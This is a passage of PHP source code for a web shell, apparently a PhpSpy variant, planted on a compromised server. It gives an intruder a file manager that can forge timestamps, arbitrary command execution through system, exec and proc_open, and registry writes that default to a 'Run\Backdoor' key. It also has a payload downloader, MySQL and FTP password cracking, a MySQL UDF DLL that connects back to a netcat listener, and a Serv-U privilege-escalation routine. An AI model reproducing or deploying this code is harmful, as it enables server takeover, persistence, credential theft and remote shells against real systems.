        if($file!=".." && $file!=".")   { 
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
 
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
            $dirperm=substr(base_convert(fileperms($filepath),10,8),-4); 
            echo "<tr class=".getrowbg().">\n"; 
            echo "  <td style=\"padding-left: 5px;\"><INPUT type=checkbox value=$file name=dl[]> [<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n"; 
            echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n"; 
            echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n"; 
            echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=search&dir=".$filepath."\">Search</a></td>\n"; 
            echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n"; 
            echo "  <td align=\"center\" nowrap>| <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."',' $file ? \\n\\n,!','1')\"></a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\"></a> |</td>\n"; 
            echo "</tr>\n"; 
            $dir_i++; 
        } else { 
            if($file=="..") { 
                echo "<tr class=".getrowbg().">\n"; 
                echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"></a></td>\n"; 
                echo "</tr>\n"; 
            } 
        } 
    } 
}// while 
@closedir($dirs); 
?> 
<tr bgcolor="#cccccc"> 
    <td colspan="6" height="5"></td> 
</tr> 
<?php 
//  
$dirs=@opendir($dir); 
$file_i = '0'; 
while ($file=@readdir($dirs)) { 
    $filepath="$dir/$file"; 
    $a=@is_dir($filepath); 
    if($a=="0"){ 
        $size=@filesize($filepath); 
        $size=$size/1024 ; 
        $size= @number_format($size, 3); 
        if (@filectime($filepath) == @filemtime($filepath)) { 
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
        } else { 
            $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>"; 
            $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>"; 
        } 
        @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); 
        echo "<tr class=".getrowbg().">\n"; 
        echo "  <td style=\"padding-left: 5px;\">"; 
        echo "<INPUT type=checkbox value=$file name=dl[]>"; 
        echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n"; 
        echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n"; 
        echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n"; 
        echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n"; 
        echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n"; 
        echo "  <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\"></a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\"></a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."',' $file ?','2')\"></a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\"></a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\"></a></td>\n"; 
        echo "</tr>\n"; 
        $file_i++; 
    } 
}// while 
@closedir($dirs); 
if(get_cfg_var('safemode'))$z = "<a href=\"#\" title=\"\" onclick=\"alert('Php\\n\\n,')\">(?)</a>"; 
else $z = "<a href=\"#\" title=\"\" onclick=\"alert('Php\\n\\n')\">(?)</a>"; 
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','','','submit').' &nbsp'.$z.'</td><td align="right">'.$dir_i.'  / '.$file_i.' </td></tr></table>','center',getrowbg(),'','','6'); 
 
echo "</FORM>\n"; 
echo "</table>\n"; 
}// end dir 
 
elseif ($_GET['action'] == "editfile") { 
    if(empty($newfile)) { 
        $filename="$dir/$editfile"; 
        $fp=@fopen($filename,"r"); 
        $contents=@fread($fp, filesize($filename)); 
        @fclose($fp); 
        $contents=htmlspecialchars($contents); 
    }else{ 
        $editfile=$newfile; 
        $filename = "$dir/$editfile"; 
    } 
    $action = "?dir=".urlencode($dir)."&editfile=".$editfile; 
    $tb->tableheader(); 
    $tb->formheader($action,'/'); 
    $tb->tdbody(': '.$tb->makeinput('editfilename',$filename).'  Php: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'php\\n\\nphpphpgzinflate\')"> '); 
    $tb->tdbody($tb->maketextarea('filecontent',$contents)); 
    $tb->makehidden('do','doeditfile'); 
    $tb->formfooter('1','30'); 
}//end editfile 
 
elseif ($_GET['action'] == "rename") { 
    $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']); 
    $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); 
    $tb->tableheader(); 
    $tb->formheader($action,''); 
    $tb->makehidden('oldname',$dir."/".$nowfile); 
    $tb->makehidden('dir',$dir); 
    $tb->tdbody(': '.basename($nowfile)); 
    $tb->tdbody(': '.$tb->makeinput('newname')); 
    $tb->makehidden('do','rename'); 
    $tb->formfooter('1','30'); 
}//end rename 
 
elseif ($_GET['action'] == "eval") { 
    $action = "?dir=".urlencode($dir).""; 
    $tb->tableheader(); 
    $tb->formheader(''.$action.' "target="_blank' ,'php'); 
    $tb->tdbody($tb->maketextarea('phpcode',$contents)); 
    $tb->formfooter('1','30'); 
 
} 
elseif ($_GET['action'] == "fileperm") { 
    $action = "?dir=".urlencode($dir)."&file=".$file; 
    $tb->tableheader(); 
    $tb->formheader($action,''); 
    $tb->tdbody(' '.$file.' : '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4))); 
    $tb->makehidden('file',$file); 
    $tb->makehidden('dir',urlencode($dir)); 
    $tb->makehidden('do','editfileperm'); 
    $tb->formfooter('1','30'); 
}//end fileperm 
 
elseif ($_GET['action'] == "newtime") { 
    $action = "?dir=".urlencode($dir); 
    $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); 
    $tb->tableheader(); 
    $tb->formheader($action,''); 
    $tb->tdbody(": ".$tb->makeinput('curfile',$file,'readonly')."  : ".$tb->makeinput('tarfile',''),'center','2','30'); 
    $tb->makehidden('do','domodtime'); 
    $tb->formfooter('','30'); 
    $tb->formheader($action,''); 
    $tb->tdbody('<br><ul><li> 1901  12  13   20:45:54  2038 1  19   03:14:07<br>( 32 )</li><li>:  01  30 ,  0  24 ,  0  60 !</li></ul>','left'); 
    $tb->tdbody(': '.$file); 
    $tb->makehidden('curfile',$file); 
    $tb->tdbody(': '.$tb->makeinput('year','1984','','text','4').'  '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).'  '.$tb->makeinput('data','18','','text','2').'  '.$tb->makeinput('hour','20','','text','2').'  '.$tb->makeinput('minute','00','','text','2').'  '.$tb->makeinput('second','00','','text','2').' ','center','2','30'); 
    $tb->makehidden('do','modmytime'); 
    $tb->formfooter('1','30'); 
}//end newtime 
 
elseif ($_GET['action'] == "shell") { 
    $action = "??action=shell&dir=".urlencode($dir); 
    $tb->tableheader(); 
    $tb->tdheader('WebShell Mode'); 
    if (substr(PHP_OS, 0, 3) == 'WIN') { 
        $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; 
        $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; 
        echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n"; 
        $tb->tdbody('  : '.$tb->makeinput('program',$program).' : '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35'); 
        $tb->makehidden('do','programrun'); 
        echo "</form>\n"; 
    } 
    echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n"; 
    if(isset($_POST['cmd'])) $cmd = $_POST['cmd']; 
    $tb->tdbody(':,.. '); 
    $tb->tdbody('proc_openwinnt,,.'); 
    $tb->tdbody('proc_opencmd:'.$tb->makeinput('cmd',$cmd,'','text','30').'(linux)'); 
    $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); 
    $tb->tdbody(': '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' : '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); 
    ?> 
<tr class="secondalt"> 
    <td align="center"><textarea name="textarea" cols="100" rows="25" 
        readonly><?php 
        if (!empty($_POST['command'])) { 
            if ($execfunc=="system") { 
                system($_POST['command']); 
            } elseif ($execfunc=="passthru") { 
                passthru($_POST['command']); 
            } elseif ($execfunc=="exec") { 
                $result = exec($_POST['command']); 
                echo $result; 
            } elseif ($execfunc=="shell_exec") { 
                $result=shell_exec($_POST['command']); 
                echo $result; 
            } elseif ($execfunc=="popen") { 
                $pp = popen($_POST['command'], 'r'); 
                $read = fread($pp, 2096); 
                echo $read; 
                pclose($pp); 
            } elseif ($execfunc=="wscript") { 
                $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed"); 
                $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command'].""); 
                $stdout = $exec->StdOut(); 
                $stroutput = $stdout->ReadAll(); 
                echo $stroutput; 
            } elseif($execfunc=="proc_open"){ 
                $descriptorspec = array( 
                0 => array("pipe", "r"), 
                1 => array("pipe", "w"), 
                2 => array("pipe", "w") 
                ); 
                $process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes); 
                if (is_resource($process)) { 
 
                    //  
                    fwrite($pipes[0], "".$_POST['command']."\r\n"); 
                    fwrite($pipes[0], "exit\r\n"); 
                    fclose($pipes[0]); 
                    //  
                    while (!feof($pipes[1])) { 
                        echo fgets($pipes[1], 1024); 
                    } 
                    fclose($pipes[1]); 
                    while (!feof($pipes[2])) { 
                        echo fgets($pipes[2], 1024); 
                    } 
                    fclose($pipes[2]); 
 
                    proc_close($process); 
                } 
            } else { 
                system($_POST['command']); 
            } 
        } 
        ?></textarea></td> 
</tr> 
</form> 
</table> 
        <?php 
}//end shell 
 
elseif ($_GET['action'] == "reg") { 
    $action = '?action=reg'; 
    $regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber'; 
    $registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor'; 
    $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe'; 
    $delregname = $_POST['delregname']; 
    $tb->tableheader(); 
    $tb->formheader($action,''); 
    $tb->tdbody(': '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','','','submit'),'center','2','50'); 
    echo "</form>"; 
 
    $tb->formheader($action,''); 
    $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ'); 
    $tb->tdbody(': '.$tb->makeinput('writeregname',$registre,'','text','56').' : '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' :  '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','','','submit'),'center','2','50'); 
    echo "</form>"; 
 
    $tb->formheader($action,''); 
    $tb->tdbody(': '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','','','submit'),'center','2','50'); 
    echo "</form>"; 
    $tb->tablefooter(); 
}//end reg 
elseif ($_GET['action'] == "downloads"){ 
    $action = '?action=dir'; 
    $tb->tableheader(); 
    $tb->formheader($action,'http'); 
    $tb->tdbody('http','center'); 
    $tb->tdbody(': '.$tb->makeinput('durl','http://google.com/muma.exe','','text','70').'<br>:'.$tb->makeinput('path','./muma.exe','','text','60').''.$tb->makehidden('do','downloads').''.$tb->makeinput('','','','submit'),'center','1','35'); 
    echo "</form>"; 
    $tb->tdbody(',.','center'); 
    $tb->tablefooter(); 
} 
elseif ($_GET['action'] == "mix"){ 
    $action = '?action=dir'; 
    $tb->tableheader(); 
    $tb->formheader($action,'mix.dll'); 
    $tb->tdbody('phpspymix.dll','center'); 
    $tb->tdbody(': '.$tb->makeinput('mixto','./mix.dll','','text','70').''.$tb->makehidden('action','mix').''.$tb->makeinput('','unzip','','submit'),'center','1','35'); 
    echo "</form>"; 
    $tb->tablefooter(); 
} 
elseif ($_GET['action'] == "crack"){ 
    $action = '?action=dir'; 
    $tb->tableheader(); 
    $tb->tdbody('','center'); 
    if($type=="crack"){ 
        $tb->formheader($action,'mysqlftp <a href="?action=crack">[Mysql]</a>'); 
        $tb->tdbody('mysql','center'); 
        $tb->tdbody('host: '.$tb->makeinput('host','localhost','','text','12').'&nbsp'.$tb->makeinput('user','root','','text','12').''.$tb->makehidden('do','crack').'&nbsp;:'.$tb->makeinput('passfile','./password.txt','','text','20').'&nbsp;:'.$tb->makeinput('onetime','100','','text','6').'&nbsp;'.$tb->makeinput('','crack','','submit'),'center','1','35'); 
        $tb->tdbody('MYSQL:<input type="radio" name="ctype" value="mysql" checked> &nbsp;&nbsp;Ftp:<input type="radio" name="ctype" value="ftp">','center'); 
        echo "</form>"; 
        if(getphpcfg("allow_url_fopen")=="Yes") $temp = ""; 
        $tb->tdbody(''.$temp.'Ftp','center'); 
        $tb->formheader($action,''); 
        $tb->tdbody('','center'); 
        $tb->tdbody('host: '.$tb->makeinput('host','127.0.0.1',''.$tb->makehidden('do','port').'','text','12').'&nbsp;:'.$tb->makeinput('port',''.$admin[port].'','','text','60').'','center','1','35'); 
        $tb->tdbody(''.$tb->makeinput('','','','submit').'','center'); 
        echo "</form>"; 
        $tb->tdbody('!','center'); 
        $tb->tableheader(); 
    }else{ 
        $tb->formheader("".$action."\" enctype=\"multipart/form-data",'Mysql <a href="?action=crack&type=crack">[Crack]</a>'); 
        $tb->tdbody('MysqlmysqlWebshell','center'); 
        $tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').'db: '.$tb->makeinput('database','mysql.user','','text','16').'upto: '.$tb->makeinput('uppath','c:/','','text','16').''.$tb->makehidden('action','mysqlup'),'center','1','35'); 
        $tb->tdbody(': '.$tb->makeinput('upname','','','text','16').': '.$tb->makeinput('upfile','','','file','26').''.$tb->makeinput('','upload','','submit'),'center','1','35'); 
        echo "</form>"; 
        $tb->tdbody('file,.','center'); 
        $tb->formheader($action,'Mysql'); 
        $tb->tdbody('MysqlWebshell  <input type="checkbox" name="rardown" value="yes" onclick="javascript:alert(\'RAR!\')"> ','center'); 
        $tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').''.$tb->makehidden('action','mysqldown').': '.$tb->makeinput('filename','C:/windows/php.ini','','text','26').''.$tb->makeinput('','download','','submit'),'center','1','35'); 
        echo "</form>"; 
        $tb->tdbody('file,.','center'); 
        $tb->tdbody('WindowsMysqlSystemLinux.','center'); 
    } 
    $tb->tablefooter(); 
} 
elseif ($_GET['action'] == "search"){ 
    $action = '?dir='.$dir.''; 
    $tb->tableheader(); 
    $tb->formheader($action,''); 
    $tb->tdbody('!','center'); 
    $tb->tdbody(': '.$tb->makeinput('path',''.$nowpath.'','','text','70').'<br>:'.$tb->makeinput('oldkey','','','text','60').''.$tb->makehidden('do','search').'<br> <input type="checkbox" name="type" value="list" onclick="javascript:alert(\',\\n\\n:[/][12/99],.\\n\\n,,!\')"> (!) <br>:<input type="checkbox" name="type2" value="getpath" onclick="javascript:alert(\'..\\n\\n....\\n\\n,,!\')"> '.$tb->makeinput('beline','0','','text','3').' '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('endline','10','','text','3').'... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','','','submit'),'center','1','35'); 
    echo "</form>"; 
    $tb->tdbody('.[/]','center'); 
    $tb->tablefooter(); 
} 
elseif ($_GET['action'] == "proxy") { 
    $action = '?action=proxy'; 
    $tb->tableheader(); 
    $tb->formheader($action,'','proxyframe'); 
    $tb->tdbody('<br><ul><li> HTTP ,CSS.</li><li>URL, SQL Injection .</li><li> URL,IP : '.gethostbyname($_SERVER['SERVER_NAME']).'</li></ul>','left'); 
    $tb->tdbody('URL: '.$tb->makeinput('url','about:blank','','text','100').' '.$tb->makeinput('','','','submit'),'center','1','40'); 
    $tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe>'); 
    echo "</form>"; 
    $tb->tablefooter(); 
}//end proxy 
 
elseif ($_GET['action'] == "sql") { 
    $action = '?action=sql'; 
 
    $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; 
    $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; 
    $dbpassword = $_POST['dbpassword']; 
    $dbname = $_POST['dbname']; 
    $sql_query = $_POST['sql_query']; 
    if($type=="fun"){ 
        $sql_query = "CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\\Winnt\\\Mix.dll'; 
select Mixconnect('".$_SERVER['REMOTE_ADDR']."','8888');/**/ 
/* nc -vv -l -p 8888*/"; 
    } 
    $tb->tableheader(); 
    $tb->formheader($action,' SQL '); 
    $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','','','submit')); 
    $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10')); 
    $tb->makehidden('do','query'); 
    $tb->formfooter('1','30'); 
}//end sql query 
 
elseif ($_GET['action'] == "sqlbak") { 
    $action = '?action=sqlbak'; 
    $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; 
    $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; 
    $dbpassword = $_POST['dbpassword']; 
    $dbname = $_POST['dbname']; 
    $tb->tableheader(); 
    $tb->formheader($action,' MySQL '); 
    $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','','','submit')); 
    @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname); 
    $tables = @mysql_list_tables($dbname); 
    while ($table = @mysql_fetch_row($tables)) { 
        $cachetables[$table[0]] = $table[0]; 
    } 
    @mysql_free_result($tables); 
    if (empty($cachetables)) { 
        $tb->tdbody('<b> or </b>'); 
    } else { 
        $tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> :</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download">  ()</td></tr></table>'); 
        $tb->makehidden('do','backupmysql'); 
        $tb->formfooter('0','30'); 
    } 
    $tb->tablefooter(); 
    @mysql_close(); 
}//end sql backup 
 
elseif ($_GET['action'] == "phpenv") { 
    $user = " <a href=\"?action=nowuser\" target=\"_blank\">crush</a> "; 
    $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : ""; 
    $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>"; 
    if ($dis_func == "") { 
        $dis_func = "No"; 
    }else { 
        $dis_func = str_replace(" ","<br>",$dis_func); 
        $dis_func = str_replace(",","<br>",$dis_func); 
    } 
    $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; 
    $info = array( 
    0 => array("php",$user), 
    1 => array("",PHP_OS), 
    2 => array("",date("Ymd h:i:s",time())), 
    3 => array("","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"), 
    4 => array("IP",gethostbyname($_SERVER['SERVER_NAME'])), 
    5 => array("",$_SERVER['HTTP_ACCEPT_LANGUAGE']), 
    6 => array("",$_SERVER['SERVER_SOFTWARE']), 
    7 => array("Web",$_SERVER['SERVER_PORT']), 
    8 => array("PHP",strtoupper(php_sapi_name())), 
    9 => array("PHP",PHP_VERSION), 
    10 => array("",getphpcfg("safemode")), 
    11 => array("",$adminmail), 
    12 => array("",__FILE__), 
    13 => array(" URL  allow_url_fopen",getphpcfg("allow_url_fopen")), 
    14 => array(" enable_dl",getphpcfg("enable_dl")), 
    15 => array(" display_errors",getphpcfg("display_errors")), 
    16 => array(" register_globals",getphpcfg("register_globals")), 
    17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")), 
    18 => array(" memory_limit",getphpcfg("memory_limit")), 
    19 => array("POST post_max_size",getphpcfg("post_max_size")), 
    20 => array(" upload_max_filesize",$upsize), 
    21 => array(" max_execution_time",getphpcfg("max_execution_time").""), 
    22 => array(" disable_functions",$dis_func), 
    23 => array("phpinfo()",$phpinfo), 
    24 => array("diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), 
    25 => array(" GD Library",getfun("imageline")), 
    26 => array("IMAP",getfun("imap_close")), 
    27 => array("MySQL",getfun("mysql_close")), 
    28 => array("SyBase",getfun("sybase_close")), 
    29 => array("Oracle",getfun("ora_close")), 
    30 => array("Oracle 8 ",getfun("OCILogOff")), 
    31 => array("PREL PCRE",getfun("preg_match")), 
    32 => array("PDF",getfun("pdf_close")), 
    33 => array("Postgre SQL",getfun("pg_close")), 
    34 => array("SNMP",getfun("snmpget")), 
    35 => array("(Zlib)",getfun("gzclose")), 
    36 => array("XML",getfun("xml_set_object")), 
    37 => array("FTP",getfun("ftp_login")), 
    38 => array("ODBC",getfun("odbc_close")), 
    39 => array("Session",getfun("session_start")), 
    40 => array("Socket",getfun("fsockopen")), 
    ); 
    $tb->tableheader(); 
    echo "<form action=\"?action=phpenv\" method=\"POST\">\n"; 
    $tb->tdbody('<b>PHP</b>','left','1','30','style="padding-left: 5px;"'); 
    $tb->tdbody('(:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','','','submit'),'left','2','30','style="padding-left: 5px;"'); 
    $tb->makehidden('do','viewphpvar'); 
    echo "</form>\n"; 
    $hp = array(0=> '', 1=> 'PHP', 2=> ''); 
    for ($a=0;$a<3;$a++) { 
        $tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"'); 
        ?> 
<tr class="secondalt"> 
    <td> 
    <table width="100%" border="0" cellpadding="0" cellspacing="0"> 
    <?php 
    if ($a==0) { 
        for($i=0;$i<=12;$i++) { 
            echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n"; 
        } 
    } elseif ($a == 1) { 
        for ($i=13;$i<=24;$i++) { 
            echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n"; 
        } 
    } elseif ($a == 2) { 
        for ($i=25;$i<=40;$i++) { 
            echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n"; 
        } 
    } 
    ?> 
    </table> 
    </td> 
</tr> 
    <?php 
    }//for 
    echo "</table>"; 
}//end phpenv 
elseif($_GET['action'] == "mysqlfun"){ 
    echo "<table width=\"760\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\"><tr class=\"firstalt\"><td align=\"left\">"; 
    if($_POST['port'] != "" && $_POST['ip'] != "" && $_POST['function'] != ""  && $_POST['host'] != "" && $_POST['user'] != "") 
    { 
        $link=@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']); 
        if (!$link) { 
            echo "<font color=red>Could not connect: ".mysql_error()."</font><br>"; 
        } 
        else{ 
            echo "<font color=blue>Connected successfully as ".$_POST['user']."</font><br>"; 
            if(isset($_POST['mixpath'])&&!@file_exists($_POST['mixpath'])){ 
                echo"<font color=red>Can't find the ".$_POST['mixpath']."</font><br>"; 
            } 
            if(isset($_POST['mixpath'])){ 
             $dll_path = addslashes($_POST['mixpath']); 
             $query="create function ".$_POST['function']." returns integer soname '".$dll_path."';"; 
             echo (@mysql_query($query, $link)) ? "<font color=blue>Success: ".$query."</font><br>" : "<font color=red>Create function faild!<br>".mysql_error()."</font><br>"; 
            } 
            echo"<font color=red>Now Select Function name of ".$_POST['function']."</font><br>"; 
            $query="select ".$_POST['function']."('".$_POST['ip']."','".$_POST['port']."');"; 
            echo (@mysql_query($query, $link)) ? "<font color=blue>Success: ".$query."</font><br>" : "<font color=red>Select Function name of ".$_POST['function']." faild!<br>".mysql_error()."</font><br>"; 
            mysql_close($link); 
        } 
    }else{ 
        echo""; 
    } 
    echo "</td></tr></table>"; 
    if($nodll=="yes"){ 
        $echodll = " <a href=\"#\" title=\"\" onclick=\"alert('addslashes\\\\\\ \\\\\\\\\n\\nnc -vv -l -p mysql')\">(?)</a>&nbsp;    Mixdll: 
      <input name=\"mixpath\" type=\"text\" class=\"INPUT\"  value=\"C:\mix.dll\" size=\"50\"> &nbsp;<a href=\"?action=mysqlfun\">(function)</a>"; 
    }else{ 
        $echodll = "<FONT color=\"blue\">function</FONT> &nbsp;<a href=\"?action=mysqlfun&nodll=yes\">(function)</a>"; 
    } 
    ?> 
<table width="760" border="0" cellpadding="3" cellspacing="1" 
    bgcolor="#ffffff"> 
    <tr class="firstalt"> 
        <td align="center">mysql_functionmix.dll</td> 
    </tr> 
    <form action="?action=mysqlfun" method="POST"> 
    <tr class="secondalt"> 
        <td align="center"><a href="?action=sql&type=fun">(Func)</a>&nbsp;: 
        <input name="port" type="text" class="INPUT" value="5438" size="6"> 
        IP: <input name="ip" type="text" class="INPUT" 
            value="<?=$_SERVER['REMOTE_ADDR']?>"> function: <input 
            name="function" type="text" class="INPUT" value="Mixconnect"> &nbsp;<a 
            href="?action=mix">(Mix.dll)</a> <br> 
        Host : <input name="host" type="text" class="INPUT" value="localhost" 
            size="12"> User : <input name="user" type="text" class="INPUT" 
            value="root" size="8"> PassWd : <input name="pass" type="text" 
            class="INPUT" value=""> <br> 
            <?=$echodll?> <? echo"<input name=\"nodll\" value=\"".$nodll."\" type=\"hidden\">";?> 
        </td> 
    </tr> 
    <tr class="secondalt"> 
        <td align="center"><input name="Submit" type="submit" class="input" 
            id="Submit" value=""> <input name="Submit" type="reset" 
            class="INPUT" value=""></td> 
    </tr> 
    </form> 
    <tr class="secondalt"> 
        <td align="center">Remember,Love is a dieing dream....</td> 
    </tr> 
</table> 
            <? 
} 
elseif($_GET['action'] == "SUExp") 
{ 
    if($_POST['SUPort'] != "" && $_POST['SUUser'] != "" && $_POST['SUPass'] != "") 
    { 
        echo "<table width=\"760\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\"><tr class=\"firstalt\"><td align=\"left\">"; 
        $sendbuf = ""; 
        $recvbuf = ""; 
        $domain  = "-SETDOMAIN\r\n". 
                "-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n". 
                "-TZOEnable=0\r\n". 
                " TZOKey=\r\n"; 
        $adduser = "-SETUSERSETUP\r\n". 
                "-IP=0.0.0.0\r\n". 
                "-PortNo=21\r\n". 
                "-User=".$user."\r\n". 
                "-Password=".$password."\r\n". 
                "-HomeDir=c:\\\r\n". 
                "-LoginMesFile=\r\n". 
                "-Disable=0\r\n". 
                "-RelPaths=1\r\n". 
                "-NeedSecure=0\r\n". 
                "-HideHidden=0\r\n". 
                "-AlwaysAllowLogin=0\r\n". 
                "-ChangePassword=0\r\n". 
                "-QuotaEnable=0\r\n". 
                "-MaxUsersLoginPerIP=-1\r\n". 
                "-SpeedLimitUp=0\r\n". 
                "-SpeedLimitDown=0\r\n". 
                "-MaxNrUsers=-1\r\n". 
                "-IdleTimeOut=600\r\n". 
